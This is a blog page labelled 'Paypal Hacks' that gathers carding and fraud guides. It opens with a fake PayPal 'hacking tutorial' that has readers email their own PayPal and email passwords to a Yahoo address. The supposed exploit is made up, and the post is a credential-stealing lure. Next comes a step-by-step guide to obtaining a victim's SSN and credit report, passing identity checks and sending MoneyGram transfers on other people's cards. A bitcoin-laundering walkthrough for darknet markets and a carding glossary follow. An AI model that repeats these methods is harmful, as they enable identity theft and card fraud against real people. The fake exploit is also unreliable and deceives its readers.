Pages

Showing posts with label Paypal Hacks. Show all posts
Showing posts with label Paypal Hacks. Show all posts

COMPLETE TUTORIAL ON HACKING INTO PAYPAL ACCOUNTS

COMPLETE TUTORIAL ON HACKING INTO PAYPAL ACCOUNTS:

Since its birth in 1998, eBay owned company PayPal (www.paypal.com) has become a hugely popular internet banking company, as the brand-new idea of sending money to anyone in the world through Email has won hearts of millions of internet users worldwide, the number of members of PayPal has been skyrocketing since. PayPal is now by far the most successful internet banking company.

However, insecurity on the internet has been a great problem since the beginning of the boom of the dotcom economy; all famous computers companies have been victims of hackers from around the globe due to security flaws in its system.

Microsoft is recent victim of the W32.Blaster.Worm virus which has been identified that could allow an attacker to compromise a computer running Microsoft Windows and gain control over it. Microsoft took immediate action after the spread of the virus, however, a considerable amount of computers worldwide have been victimized and the Blaster Worm is still at large. More information on this security flaw in the Microsoft Windows and the nature of the virus can be found at:
http://www.symantec.com/avcenter/ven...ster.worm.html

Like Microsoft, PayPal is the latest victim of internet hackers. Despite the company’s seemingly perfect security system, a serious security flaw in the ADDRESS CONFIRMATION PROCESS of PayPal’s members’ accounts has been discovered by a few experienced hackers from Russia. The hacking process has been simplified a while ago and it was revealed on a Russian language hacking website at:
http://vir.ru/index.html

PayPal was immediately alerted of this security flaw after the Russian language hacking tutorial was published on the above website, but in order to prevent its customers from losing trust in internet banking, PayPal chose NOT to alert its customers of this security flaw and has then secretly BANNED numerous online articles that contained information of this security flaw.

However, it has been confirmed that due to technical difficulty, PayPal has NOT yet fixed the problem and at this moment right now, anyone can STILL hack into a great number of PayPal accounts with confirmed addresses.

To inform users worldwide of this problem, I’ve attached an English version of the hacking process. Remember, to get the whole thing to work, you MUST
STRICTLY follow the instructions and have a PayPal account with a confirmed mailing address!


HACKING PROCESS:

Every PayPal member is identified by his/her Email and the majority of the PayPal members use Yahoo or Hotmail. After completion of the mailing address confirmation process, usually by adding a CREDIT CARD, PayPal automatically sends the user’s address confirmation info to a mailerbot associated with the user’s Email, in most cases, it’s either a Yahoo mailerbot or Hotmail mailerbot.

The security flaw occurs RIGHT HERE! Both Yahoo and Hotmail mailerbots can be confused by a random user and sends out information saved on its server to that user.
To get PayPal account information of numerous random PayPal users from a Yahoo or Hotmail mailerbot, you have to do the following:

1) Log into your www.paypal.com homepage, and click on “Profile”, and then click on
“Street Address” under “Account Information”.

2) Find the Address whose status is “Home”, and if it says “confirmed”, then please read on.

Basically, A Confirmed Address is any address at which you receive your credit card statement. If you receive a credit card bill at this address, you can confirm it by entering your credit card information. This information will only be used to confirm your address. Your card will not be charged by PayPal.

So, if your Home address is NOT confirmed, then FOLLOW THE INSTRUCTIONS ON PAYPAL AND ADD A CREDIT CARD TO CONFIRM YOUR MAILING ADDRESS.

3) Now, Check if your PayPal Email is a Yahoo or a Hotmail Email. If it is, please read on. If it is not, create either a yahoo or hotmail Email and log on to www.paypal.com, go to Profiles and then Email, and make it your PRIMARY Email, i.e. the one through which you log on to PayPal and receive Emails from paypal.

4) Okay, now your primary Email is either a Yahoo Email or a Hotmail email, right?

I. If it’s a Yahoo email, then:

Log in to that email account at http://mail.yahoo.com and send an Email to:

paypal11922mail11bot922@yahoo.com (This is the Yahoo mailerbot described above)

In the subject line, write:

0yah3534paypal78verif-0e24 (To confuse the Yahoo mailerbot)

In the email body, please write exactly 12 lines, which MUST BE as follows:

In line 1: Content-Type: text/plain;

In line 2: charset=us-ascii
(To make the reply readable)

In line 3: address000%%confirmation0e24.yahoo.com
(To confuse the mailerbot)

In line 4: p38ylec00rm::s%%http://www.paypal.com%%
(To make the mailerbot start retrieving information acquired from PayPal.)

In line 5: Your primary email at paypal
(To retrieve information from PayPal, The mailerbot now needs an Email which is the primary Email of a PayPal account with a confirmed mailing address, you have to use your own Email as a bait Email and you’ll need to receive info of other accounts from this Email too, so be sure this is your primary Email at PayPal.)

In line 6: start (retrieve > 0)
(To activate the mailerbot’s retrieval function)

In line 7: verified (*value= = float)
(To continue the mailerbot’s retrieval function)

In line 8: Your PayPal password
(Now you have to enter your paypal password, as the yahoo mailerbot was programmed in a way that it sends testing info to PayPal who’ll verify each account’s password and confirm it with the Yahoo mailerbot. So in line 8, you have to enter your valid/correct password of your PayPal account.)

In line 9: #searchmsgend72hr
(To search for info of PayPal members who had their addresses confirmed in the last 72 hours)

In line 10: Your yahoo email password
(By entering the password of your email. The yahoo mailerbot will assume this is a command from the administrator and will send out information to the “administrator” who is actually you.)

In line 11: send&&idR20034-tsa-0583
(This will make the mailerbot send all the info to your email)

In line 12: #endofmsg
(Last step!)

Note: Please STRICTLY follow the instruction above and you’ll be guaranteed to get an automatic reply from the confused Yahoo mailerbot! Then you’ll have email, password and all sorts of information of PayPal users who had their mailing addresses confirmed over the last 72 hours.

How to Get a BackGround Check and Credit Report On Anyone

How To Get a Background Check and Credit Report on ANYONE ! Links and Method working as of publication – Febuary 8, 2015
Having this information can be very beneficial for answering security questions, opening bank accounts, applying for credit, verifying accounts, among many other things. However, getting this information can be a little tricky, and sometimes unobtainable. With a little luck and this guide, you will have the tools and resources to give you the best chance possible to obtain this information.
There are a couple things you will need first. Some are required and some are very helpful to have. Obviously, it helps to have a person’s fullz which include:
1. Persons full legal name 2. Current and/or previous addresses 3. Date of Birth (DOB) and Social Security Number (SSN) 4. Mothers maiden name
However, the only two things that are required are FULL LEGAL NAME and a USA CVV or anonymous debit card. I use This Site. You will also need to know one of the following things about the person; their city, state, zip code, or DOB. Google is your friend and if the person’s name is unique enough you can obtain most of this information with a simple search.To get the persons DOB, the easiest way is to use the online database familysearch.org.
There are 100’s of these services, some are free and some charge a fee. Just use your CVV if you need to pay for background check. Having a background check will help out when trying to get the credit report described later in this guide but familysearch.org has pretty much all the background info you need, and it’s FREE. Once we have located the DOB and any other information on the subject, we can now get their SSN. Go to ssnfinder.ru and register for free. Once you are logged in they charge $3.00 per search. You will need the full legal name of the subject and either the city, state, zip code, or DOB. From my experience they are successful finding the SSN about 80% of the time. At this point you should have the needed background
information to complete the next step.
First, register at 3 sites offering credit report like Site #1 Site #2 Site #3 Site #4 Site #5
Again there are tons options and the more you try the better chance you have to be successful.
Start to sign up for these services with all the information you have obtained including SSN and DOB. At some point they will ask you security questions to verify you are the person you are trying to get information on. Normally, all of them will ask you same questions so keep track of your answers. Most questions you should be able to answer with the information you previously obtained or simply searching Google. For the questions you have to guess on, make note of how you answered and it helps to capture the screen to remember.
After you click the Submit button you will know if you were successful or not. If it says that you are verified you got all the questions correct! You don't need to do anything else with the other credit report websites. But if it says Wrong answers then leave this website and go the second one. Again, the questions should be almost the same. Check the answers you used for the last website and guess a different one. Click submit and wait and see what the webpage says. If it says you are verified then you’re done. Otherwise continue to the third, fourth, so on until you get all answers correct.At this point you will have the background report, credit report, and make sure you save the answers to the security questions you just answered correctly. These are different than the security questions the user might have created for online banking or accounts they have already created but they will be the same for when you need to create new accounts on Coinbase or creating online bank accounts. You can also use this information to create a Money Gram account to send money with bank account or credit cards.
Register on Money Gram website using all the information you just obtained. When you come to the payment page, they will ask the same questions you had to answer to get the credit report. Answer questions and send transfer! You can use any credit card owned by anyone as long as you change the address on record with MG to the address of the card holder. No need to change MG account name. Money Gram doesn’t make the connection between account owner and credit card owner. They will authorize the transfer as long as you answer the security questions and the Money Gram address matches the CVV address.

ENJOY!

A Simple Guide to Safely and Effectively Tumbling (Mixing) Bitcoins

A Simple Guide to Safely and Effectively Tumbling (Mixing) Bitcoins
Defination:
Bitcoin tumbling, also referred to as Bitcoin mixing or Bitcoin laundering, is the process of using a third party service to break the connection between a Bitcoin address sending coins and the address(s) they are sent to. Since the Bitcoin blockchain is a public ledger that records every transaction, mixing coins is critical for anyone who doesn’t want the entire world to know exactly where they send and store their BTC, or from where they receive it.
Properly mixing coins may seem like a daunting task to those who aren’t very familiar with Bitcoin, but it is actually a simple process that will only take a few minutes of your time for each deposit.
There are good reasons for everyone to mix their coins, but for those who use Darknet Markets in particular, it is a necessity. New tools are being built all the time to increase the ability of the public, as well as private corporations and government agencies, to follow coins through the blockchain and track those who use it. It may seem like a waste of time now, but in the near future it may be simple for anyone- including friends, relatives, employers, and law enforcement, to track every Bitcoin transaction you’ve ever made and see exactly where it ended up. Breaking the connection between your addresses and the coins’ destination by mixing them is certainly a precaution that all DNM users should take.
In this guide we attempt to provide the simplest possible step-by- step instructions to help users unfamiliar with the process of Bitcoin tumbling do so effectively. This guide assumes the reader already has a basic understand of how to send Bitcoins.
To mix your coins using this method, you will need:
-Bitcoins, or the ability to buy them. -Tor -The ability to create new Bitcoin wallets, both via Tor and on the clear net. We recommended using This wallet, but any client that functions over Tor will work. Alternately, you could use This Online Wallet and their Tor hidden service to create all or some of your wallets.
NOTE: Always make sure you get the .onion link for this and every hidden service from a safe place (like Here), never from Wikipedia, Reddit, or Hidden Wikis! Also make sure that you never use the blockchain.info clearnet url over Tor; doing that opens you up another possible vulnerability (malicious tor exit nodes). A good place to make sure you are using the correct URL is from this This Resources page.
The Steps
Step #1: Create a wallet on the clearnet. (We will refer to this as wallet #1)
Step #2: Buy Bitcoins, and send the amount you want to mix to wallet #1.
Step #3: Create a second wallet, this time over the Tor network. (wallet #2)
Step #4: Send your bitcoins from wallet #1 directly to wallet #2.
The reason for this is to add plausible dependability between your clearnet wallet and in-person purchases. If you are ever investigated by law enforcement or the company from which you are buying coins (this happens with Coinbase.com especially), you can reasonably claim that you sent them to someone else who controls wallet #2 (for whatever made-up reason you have in mind as your excuse for your BTC purchase). After that you have no idea/don’t care what that person did with them, nor should anyone expect you to.
Step #5: Create a third wallet, also over the Tor network. (wallet #3).
Step #6: Select which mixer you will be using, and set up your transaction there using the address(s) from wallet #3. It is best to use multiple addresses, and to set random time delays.
ALWAYS MAKE SURE YOU ARE USING THE CORRECT .ONION LINKS!
Scams are rampant everywhere online, and the darknet is no different. You can choose your mixer(s) and get the correct URLs from our List Of Darknet Bitcoin Mixers.
We recommend Helix by Grams first, and then Bitcoin Fog, as the two seemingly best in a group of imperfect options. They have both been extremely reliable so far while processing millions of dollars. DO NOT use blockchain.info’s shared send or any other coinjoin product as your mixer, as those do not completely hide your trail like the others.
Helix Grams .onion URL: http://grams7eu3phkfrt3.onion/helix/light/
Bitcoin Fog URL: http://foggeddriztrcar2.onion
NOTE: Turn off JavaScript before doing this step if you are using Helix, Bitcoin Fog, Bit Blender, or other mixers that function without it. (Click on the “S!” icon before the address bar in the Tor browser, then >Forbid Scripts Globally”.)Unfortunately Bitmixer still requires users have JavaScript enabled. Save the “Letter of Guarantee” if you are using Bitmixer. If you are using Helix, save the URL it sends you to after you enter your address(s). Make a backup of these, or your login details for the other mixers.
Step #7: Send the coins from wallet #2, over Tor, to the address generated for you by the mixer.
Step #8: Assuming these coins are going to be sent to a darknet market... if you don’t already have your deposit address, log in and get it while having JavaScript disabled. Never use any market that requires you to enable JS!
Step #9: You can use This hidden service to watch for your coins to arrive from the mixer. Once they have, restart Tor and then send the coins to your market address (or their eventually destination)!
The reason you should create an extra wallet in between your mixer and market account, is in case you ever run in to any type of problem with your account (lost password, hacked/phished, lost PGP key, etc), you can use the fact that you control all of the recent deposit address as proof that you are the rightful owner of this account.
You should also create a wallet you control in between any coins you may ever withdrawal from a market and a mixer. This is far more important than the reverse, in case the market takes a long time to put your deposit through (which happens, trust me). Mixers only keep track of the addresses it generates for you for a set amount of time, usually between 6 and 24 hours. If you initiate a withdrawal from a market directly to a mixer’s bitcoin address, and the market runs into problems and doesn’t send your withdrawal for 48 hours, you face a very real risk of the mixer not forwarding your coins. This would not be the mixer’s fault, as they are open about how they work. They purge records every X hours for privacy.
TIP: You can use Blockchain.info’s taint analysis to make sure that no trace remains between wallet #2 and wallet #3. Access it like this, replacing 1YOURBITCOINADDRESS (in blue) with yours:
https://blockchainbdgpzk.onion/taint/ 1YOURBITCOINADDRESS
Search this page for your address(s) from wallet #2. If they aren’t there, you’ve successfully performed a zero-taint mix of your Bitcoins! If an address from wallet #2 does show up, there is a problem with the mixer you are using, you should contact them and/or use a different one in the future.
The only weakness remaining is the fact that the mixing company has records of your transactions, and although they all claim to delete them shortly after the transaction is complete, it is possible they could have a trail of where your coins went. You can negate this risk by repeating the process with a second mixing service.
I probably made this sound more complicated than it actually is. In total it should only take about 10-15 minutes, and it is something worth doing if you value your privacy and want to make sure you never lose any coins!

As with anything, you should do your research before using Bitcoin tumbling services and use the ones with the best reviews and highest levels of trust. The tumblers we list as trusted have been around for some time and have had no verifiable complaints against them. The other services listed are either newer, have been hacked, or have had numerous complaints against them. We do not link to mixers that are scams, or that do not function as advertised.

Carding Terms

Carding Terms:

3DS/3-D Secure - XML-based protocol designed to be an additional security layer for
online credit and debit card transactions.

ACH - Automated Clearing House. The voluntary association of depositors, which
achieves clearing of checks and electronic units by the direct exchange of means between

Amex - American Express.ATM - An unattended, magnetic stripe-reading terminal that dispenses cash; accepts
deposits and loan payments; enables a bank customer to order transfers among accounts
and make account inquiries.

Authorization - The process in which a credit card is accepted, read and approved for a
sales transaction. Credit card authorization is normally accomplished by reading a credit
card through a credit card reader that is integrated into a register or stand-alone reading
device. Generally, pertinent credit information is transmitted via a modem and telephone
line to a credit card "clearinghouse". The clearing house (authorization source)
communicates with the credit card's bank for approval and the appropriate debit amount
of the sale.

AVS - Address Verification System. Used for confirmation the card belongs exactly to its
holder.

BIN - Bank Identification Number. First 6 digits of PAN. Used to identify the Issuing
Bank and Card Type.

Blockchain - The "core" of bitcoin; usually refers to blockchain.info, where all bitcoin
transactions are publicly recorded.

BTC - Bitcoin. Anonymous digital currency.

BTC Address - a unique identifier which allows you to receive bitcoins.
Chargeback - Cardholder's bank voids the removal of money from it's card.

CC - Credit Card. Usually refers to physical card.

CID - Card Indentification Number. 4 digit verification code on front of card [Amex].

COB - Change of billing. Used for online carding, to change the billing address of a card
since Online Stores will only ship large items if the billing and shipping address match.
Once you have this, you can easily change the card address to that of your drop so that
the stores ship items to your drop, since the billing and shipping addresses will match.

Coercivity--The measure of how much magnetic force is needed to change the state of a
magnetized element. The higher the coercivity, the more force is needed. There are two
types of magnetic stripe cards, low coercivity and high coercivity. While low coercivity
cards can be erased if they get too close to a common magnet, high coercivity cards are
not as easily erased.

CVC/CVC2 - Card Verification Code. Same as CVV, but for Mastercard.

CVV/CVV2 - Card Verification Value. 3 digit code on reverse of card used to validate
Card-not-Present purchases [Visa]. Alternatively it can be used to refer to basic stolen
card information [PAN+EXP+CVV].

DC - Debit Card. Card, which resembles the credit card by the method of using, but
making possible to realize direct buyer account debiting at the moment of the purchase of
goods or service.

Deer - Scammer (buyer)

Direct Debit - Payment levy method, mainly, with the repetitive nature (lease pay,
insurance reward, etc.) with which the debitor authorizes his financial establishment to
debit his current account when obtaining of calculation on payment from the indicated
creditor.

DL - Driver's License.

DOB - Date of Birth.

Drop - Anonymous address which is unconnected to the carder, where packages can be
sent.

Dump - information, which is written to the magnetic strip of the card. It consists of 1,2
or 3 tracks.

EFT - Electronic Fund Transfer. The remittance of means, initiated from the terminal,
telephone or magnetic carrier (tape or diskette), by transfer of instructions or authorities
to financial establishment, that concern to the debiting or crediting of the account (see
Electronic Fund Transfer/Point of Sale - EFT/POS).

EFT/POS - Electronic Fund Transfer/Point of Sale. Debiting from the electronic terminal,
for the means transfer purpose from the account of a buyer into the payment on the
obligations, which arose in the course of transaction at the point of sale.

Embosser - a machine designed for use with plastic cards to create raised print characters.

EMV - Europay, MasterCard and VISA. A global standard for inter-operation of
integrated circuit cards.

Encoder - Read/write device for the magnetic track of the card.

E-shop - Online shop.

Exp - Expiry Date.

ewallet - External provider where bitcoins can be stored.

Fulls/Fullz - Credit card data which comes with additional information such as DOB,
SSN, MMN, Bank information etc. Clarify with each vendor what their fulls include.

GSM - Global System for Mobile Communication. A communications standard for
mobile phones.

Hologram - A unique form of photographic printing that is a flat optical image that to the
naked eye looks and provides a three-dimensional effect on a flat surface. Holograms
cannot be easily copied and are used for security and aesthetic purposes on cards.

ICC - Integrated Circuit Card (also as chip card). Card equipped with one either several
computer micros-chip or integrated microcircuits for identification and storing of data or
their special treatment, utilized for the establishment of the authenticity of personal
identification number (PIN), for delivery of permission for the purchase, account balance
checking and storing the personal records. In certain cases, the card memory renewal
during each use (renewed account balance).

ICQ - Instant messaging service popular among carders.

IIN - same as BIN.

ISO - International Standardisation Organisation. International organization, which
carries out standardization, with the staff office in Geneva, Switzerland.

Issuing Bank - Financial Institution that issued the card.

Jabber - an open source, XML-based instant messaging platform commonly used by
carders.

LR - Liberty Reserve. Anonymous digital currency [now obsolete].

MC - Mastercard.

MCSC - Mastercard Secure Code - Mastercard's implementation of 3-D Secure protocol.
Merchant account - Bank account for accepting credit cards.

MICR - Magnetic Ink Character Recignition. System, which ensures the machine reading
of the information, substituted by magnetic inks in the lower part of the check, including
the number of check, the code of department, sum and the number of account.

MMN - Mother's Maiden Name.

NFC - Near Field Communication. A technology standard for very-short-range wireless
connectivity that enables quick, secure two-way interactions. Similar to RFID and
incorporated into most modern smartphones.

OTR - Off the Record. Cryptographic protocol that provides strong encryption for instant
messaging conversations.

PAN - Primary Account Number. Usually refers to 16 digit number on front of card.
Pidgin - Instant messaging client supporting AOL, Yahoo, MSN, ICQ and Jabber
networks.

PIN - Personal Identification Number. A 4-12 character secret code that allows an issuer
to positively authenticate the cardholder for the purpose of approving an ATM or
terminal transaction occurring at a point-of-interaction device.

Plastic - Physical card. Usually refers to blank or cloned cards.

POS - Point of Sale. Term normally used to describe cash register systems that record
transactions or the area of "checkout" in a retail store.

Reader - A device that reads the magnetic stripe on a credit card for account information
to automatically be processed for a transaction. A credit card reader is either integrated
into a register, attached onto a register as a separate component or is part of a stand-alone
terminal dedicated for the sole function of processing credit card transactions.

Ripper - Scammer (vendor)

RFID - Radio Frequency Identification. Technology which allows an object or person to
be identified at a distance, without physical contact, using radio waves to energise and
communicate with some form of tag or card.

Skimming - The fraudulent copying of the magnetic stripe stored information.

SIM - Subscriber Identification Module. Smart card that connects to a GSM phone and
establishes the users identity.

Socks - SOCKet Secure. Internet protocol that routes network packets between a client
and server through a proxy server.

SSN - Social Security Number.

Tipper - a machine designed for foil stamping of raised print characters on plastic cards
(see also Embosser).

Track - One of up to three portions of a magnetic stripe where data can be written.

Track 1 - Information on a credit card that has a 79 character alphanumeric field for
information. Normally a credit card number, expiration date and customer name are
contained on track 1.

Track 2 - Information on a credit card that has a 40 character field for information.

Normally a credit cad number and expiration date are contained on track 2.

Track 3 - Normally not used. Information on a credit card that has 107 character field for
alphanumeric information. Normally a credit card number, expiration date and room for
additional information are available on track 3.

VBV - Verified by Visa - Visa's implementation of 3-D Secure protocol.

VPN - Virtual Private Nework.

XMPP - See entry for Jabber.

Statistics Help Online

Are you a college student taking a statistics course and interested in paying someone to do mymathlab  for you ? We provide stats help in ar...